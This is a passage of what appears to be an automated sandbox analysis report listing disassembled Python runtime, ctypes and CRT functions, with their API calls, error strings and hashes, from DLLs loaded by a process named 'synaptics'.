                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocErr_StringUnicode_
                                                                                                                                                                                                              • String ID: SECURITY_DESCRIPTOR$The object is not a PySECURITY_DESCRIPTOR object$can't delete SECURITY_ATTRIBUTES attributes
                                                                                                                                                                                                              • API String ID: 3427960318-1426751177
                                                                                                                                                                                                              • Opcode ID: ae58de10c03a2c60a1d8d54ee31cd49659cd76185dd89f6e35714207d100e754
                                                                                                                                                                                                              • Instruction ID: 1dd1ef890b780c431d9483c4162282a9fb6639930727471cb173cf3f1d88ba7c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae58de10c03a2c60a1d8d54ee31cd49659cd76185dd89f6e35714207d100e754
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C32136339182019FC700AF28E884656BFB5EF5233870406A5EDA087277C326E859CAA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_UnpackTuple.PYTHON310(?,byref,00000001,00000002,?,?), ref: 6C0AAD64
                                                                                                                                                                                                              • PyNumber_AsSsize_t.PYTHON310(?,00000000), ref: 6C0AAD7A
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0AAD8A
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C0B56F8), ref: 6C0AADA7
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,byref() argument must be a ctypes instance, not '%s',?), ref: 6C0AADC9
                                                                                                                                                                                                              • _PyObject_New.PYTHON310(6C0B5D90), ref: 6C0AADDE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • byref, xrefs: 6C0AAD5C
                                                                                                                                                                                                              • byref() argument must be a ctypes instance, not '%s', xrefs: 6C0AADC2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$Arg_FormatNumber_Object_OccurredSsize_tSubtypeTupleType_Unpack
                                                                                                                                                                                                              • String ID: byref$byref() argument must be a ctypes instance, not '%s'
                                                                                                                                                                                                              • API String ID: 600276322-1446499295
                                                                                                                                                                                                              • Opcode ID: a0b4aa08ac47aa01b97135fe47f79ffa6c34907a337d2a8680ba3ee5fbd07d94
                                                                                                                                                                                                              • Instruction ID: ee6f82812360dcb9994f652e9438dffc68044a4c313ead0d90ea5f70fccebcd2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0b4aa08ac47aa01b97135fe47f79ffa6c34907a337d2a8680ba3ee5fbd07d94
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E219174A05204AFDF00CF98DD89B897BF8EF05219F2442A5E84AE7642E773DA51DB84
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyUnicode_AsWideCharString.PYTHON310(00000000,00000000,00000000,?,6BF41E0A,?,0000001C,00000000,00000000), ref: 6BF49372
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EADFC,Getting WCHAR string,00000000,00000000), ref: 6BF49393
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,None is not a valid string in this context,00000000,?,6BF41E0A,?,0000001C,00000000,00000000), ref: 6BF493D6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Objects of type '%s' can not be converted to Unicode., xrefs: 6BF493FA
                                                                                                                                                                                                              • None is not a valid string in this context, xrefs: 6BF493CF
                                                                                                                                                                                                              • <NULL!!>, xrefs: 6BF493EF, 6BF493F4
                                                                                                                                                                                                              • Getting WCHAR string, xrefs: 6BF4938C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Err_$CharUnicode_Wide
                                                                                                                                                                                                              • String ID: <NULL!!>$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.
                                                                                                                                                                                                              • API String ID: 3849944921-1767480999
                                                                                                                                                                                                              • Opcode ID: caca512c87a84a3469b6f91a94acfce434319cdd9420aa4af5d0986fb2fa23fd
                                                                                                                                                                                                              • Instruction ID: cf54917c5f6e3df05f1cebc185768766393de408c0615c0c08a5936905d921bb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: caca512c87a84a3469b6f91a94acfce434319cdd9420aa4af5d0986fb2fa23fd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F2190733252118FCB09EF58D944A6ABBE4EB86712B0084ADF406C7277CB35D928DB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyTuple_New.PYTHON310(?), ref: 6C0AB3DA
                                                                                                                                                                                                              • PyLong_FromSsize_t.PYTHON310(?), ref: 6C0AB3F7
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0AB40A
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0AB41B
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310(siN,?,?,00000000), ref: 6C0AB436
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,not a ctypes type or object), ref: 6C0AB44F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$BuildDeallocFromLong_OccurredSsize_tStringTuple_Value
                                                                                                                                                                                                              • String ID: not a ctypes type or object$siN
                                                                                                                                                                                                              • API String ID: 1444022424-92050270
                                                                                                                                                                                                              • Opcode ID: 487c46589bb85a7315213d2fc9f697d7c994b8b94d193e836d5ab678126ba163
                                                                                                                                                                                                              • Instruction ID: 743a0fecd71b0df25949f390ae68146c792d7c4065556ebfc1ef66ab66aa352e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 487c46589bb85a7315213d2fc9f697d7c994b8b94d193e836d5ab678126ba163
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD210532A04B08DFCB108FE5D945B9677F4FF41B29B144828EA5A93A12D732E422CB41
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,can't delete attribute), ref: 6C0A2647
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,unicode string expected instead of %s instance,?), ref: 6C0A2671
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • unicode string expected instead of %s instance, xrefs: 6C0A266A
                                                                                                                                                                                                              • string too long, xrefs: 6C0A26A6
                                                                                                                                                                                                              • can't delete attribute, xrefs: 6C0A2640
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$FormatString
                                                                                                                                                                                                              • String ID: can't delete attribute$string too long$unicode string expected instead of %s instance
                                                                                                                                                                                                              • API String ID: 4212644371-1577475929
                                                                                                                                                                                                              • Opcode ID: 3093c43c16f47735b6d89ef1deb8e2d18bace4c2aa07b99a5cd84c8d05937ed2
                                                                                                                                                                                                              • Instruction ID: 1c8147e25c0da4f79e1a69361c1a3facf450b058108db4687d9c470f0b884466
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3093c43c16f47735b6d89ef1deb8e2d18bace4c2aa07b99a5cd84c8d05937ed2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7112732304140AFCA00CB99ED48F8537F9EF41779F004621FA1CDA6A2CB33D4658B98
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyTuple_Size.PYTHON310(?), ref: 6BF4814C
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310((s),6BF51370), ref: 6BF48163
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(?,strftime), ref: 6BF48182
                                                                                                                                                                                                              • PyObject_Call.PYTHON310(00000000,?,00000000), ref: 6BF48195
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF481B0
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF481BF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocObject_$AttrBuildCallSizeStringTuple_Value
                                                                                                                                                                                                              • String ID: (s)$strftime
                                                                                                                                                                                                              • API String ID: 4125559156-1254993691
                                                                                                                                                                                                              • Opcode ID: 3a0cbd928e8f5dc2b78c72985b0c39d6611b601421d054420fc948ee41566e01
                                                                                                                                                                                                              • Instruction ID: 345d47be63abd091a55b2dee811ca26cdcea5bccad5f97c524fb20d459e72441
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a0cbd928e8f5dc2b78c72985b0c39d6611b601421d054420fc948ee41566e01
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67016833D002211BC3116A749C44BAB7B64DBD3632F0003AAFD1481273E62EE92991E2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EA434,cannot delete attribute), ref: 6C0A2459
                                                                                                                                                                                                              • PyObject_GetBuffer.PYTHON310(?,?,00000000), ref: 6C0A2470
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,byte string too long), ref: 6C0A2494
                                                                                                                                                                                                              • PyBuffer_Release.PYTHON310(?), ref: 6C0A249E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String$BufferBuffer_Object_Release
                                                                                                                                                                                                              • String ID: byte string too long$cannot delete attribute
                                                                                                                                                                                                              • API String ID: 2002331491-688604938
                                                                                                                                                                                                              • Opcode ID: 0df6150482ef33ee82528c3ac285c23f3b249ce8fb950c99642a62c0127e3665
                                                                                                                                                                                                              • Instruction ID: 834c00ad4026c7bafe933dadf943f23d21427be27334ac03f7c6eb9013312e56
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0df6150482ef33ee82528c3ac285c23f3b249ce8fb950c99642a62c0127e3665
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D01A171E040489FCB00DBECDE49AD87BB9EB0522CF0086A0FD1DE6251EB33D9258B65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6C0311AF
                                                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6C0311C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3090490537.000000006C031000.00000020.00000001.01000000.0000002A.sdmp, Offset: 6C030000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090285061.000000006C030000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090687006.000000006C033000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090881392.000000006C035000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c030000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2442719207-0
                                                                                                                                                                                                              • Opcode ID: f105748edf53169cb8ffd14e5981350dbc7d0c529890ec89fb0f74f9a35da378
                                                                                                                                                                                                              • Instruction ID: ffb42a540bd9358c67213c897613e850469fe51f5f2ec46f4b4c00326326918c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f105748edf53169cb8ffd14e5981350dbc7d0c529890ec89fb0f74f9a35da378
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A411872E0423BEBCB208F95CC40BDE3AF4EB4DB59F116515E81D9BA40C734D9168BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6BFC11AF
                                                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6BFC11C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3084730871.000000006BFC1000.00000020.00000001.01000000.00000031.sdmp, Offset: 6BFC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084621815.000000006BFC0000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084925591.000000006BFC3000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085116642.000000006BFC4000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085224740.000000006BFC5000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bfc0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2442719207-0
                                                                                                                                                                                                              • Opcode ID: 37ac7beb320e105fd1b71b367ecdf5dfc2e9bac07131e87ec4b9678056366108
                                                                                                                                                                                                              • Instruction ID: eda19106b9a599eefcae375ef4ba7fd097dfe5808ae6c9edfe6b58120aaef37d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37ac7beb320e105fd1b71b367ecdf5dfc2e9bac07131e87ec4b9678056366108
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C41E573E0423BABDB218F64C841B9F36B8EB45759F114155E81597670C7388FE18BA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6BF4C45E
                                                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6BF4C478
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2442719207-0
                                                                                                                                                                                                              • Opcode ID: 9b3f7556af9da428c6d47eaba1494b7702e9fd6422f1549a2c9c8fe98f97140b
                                                                                                                                                                                                              • Instruction ID: 992057c339d5eabf41e6d05cc1c9158d6e5a77f61eb0c61b635a332c86701e4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b3f7556af9da428c6d47eaba1494b7702e9fd6422f1549a2c9c8fe98f97140b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9041D773D04619AFDB118FB9CD01BAE3FB4EB85754F01655AE81457272D73C8D098BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6BF811B5
                                                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6BF811CF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2442719207-0
                                                                                                                                                                                                              • Opcode ID: 8a1a7ae65f73d6de6b1519860115f79f0d69db4e678a26a06c937d926b7c90ff
                                                                                                                                                                                                              • Instruction ID: 2fc7064a02d775b871e98be6f884c87f27c9d62c84086742805d5dfc64bc8ff8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a1a7ae65f73d6de6b1519860115f79f0d69db4e678a26a06c937d926b7c90ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4541C573D00236EBDB118F65CC41BAE7679EB49B94F014355E8349B670C7388B518BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6C0511AF
                                                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6C0511C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3092314378.000000006C051000.00000020.00000001.01000000.00000028.sdmp, Offset: 6C050000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092106316.000000006C050000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092520115.000000006C054000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092720561.000000006C055000.00000004.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092992757.000000006C056000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c050000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2442719207-0
                                                                                                                                                                                                              • Opcode ID: 8fc6b0c9331634bb335ad91decf232f2dfafcd5fe608045337fe637cfe8b7396
                                                                                                                                                                                                              • Instruction ID: 991b06451f7ff63e8abf837b13ef0ca8fe072baf21d404a7b5ba65da9c9cb6ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fc6b0c9331634bb335ad91decf232f2dfafcd5fe608045337fe637cfe8b7396
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B41F472E09218EFCB108F95CB40BEE3AF8EB45B59F904119E815A7A40C770D9758BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6BF311AF
                                                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6BF311C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3079308505.000000006BF31000.00000020.00000001.01000000.00000037.sdmp, Offset: 6BF30000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079115779.000000006BF30000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079418715.000000006BF33000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079607016.000000006BF34000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079797292.000000006BF35000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf30000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2442719207-0
                                                                                                                                                                                                              • Opcode ID: 02d9b1edcb77b3446ff77156ecd75a7bef70bbeb778e6fe11a0e6e1363e2b3f1
                                                                                                                                                                                                              • Instruction ID: 35b0fbce35b4fb5d9f8796473bcc9828149de74b00db65d51152c4e8a1885656
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02d9b1edcb77b3446ff77156ecd75a7bef70bbeb778e6fe11a0e6e1363e2b3f1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6410673E0023AEFDB209FA9DC41B9E36B9EB45B95F014159E815A7670C7398B118BE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 6BF46169
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46189
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 6BF4619E
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF461B8
                                                                                                                                                                                                              • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 6BF461C8
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF461DB
                                                                                                                                                                                                              • GetSecurityDescriptorGroup.ADVAPI32(?,?,?), ref: 6BF461EB
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF461FE
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46204
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$DescriptorSecurity$DaclGroupOwnerSacl
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1682580523-0
                                                                                                                                                                                                              • Opcode ID: 542f421cf1aa727264e1b6148c32c69bc9615154c807e37981baf9b3798e4a50
                                                                                                                                                                                                              • Instruction ID: b47d9bf88a8ff3ca84acd6c2ad2661cc7fa6572ce5e16563c803fe003feb25d4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 542f421cf1aa727264e1b6148c32c69bc9615154c807e37981baf9b3798e4a50
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C621CD72504305BBE701DE65DC84BAB7BECAE85A50F04486EF965C2162E734D51CCBA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyThreadState_Get.PYTHON310(?,?,00000000,00000000), ref: 6C0AB4CD
                                                                                                                                                                                                              • _Py_CheckFunctionResult.PYTHON310(00000000,6C0B6010,00000000,00000000), ref: 6C0AB507
                                                                                                                                                                                                              • _PyObject_MakeTpCall.PYTHON310(00000000,6C0B6010,00000000,00000000,00000000), ref: 6C0AB51E
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C0B5238), ref: 6C0AB5FB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
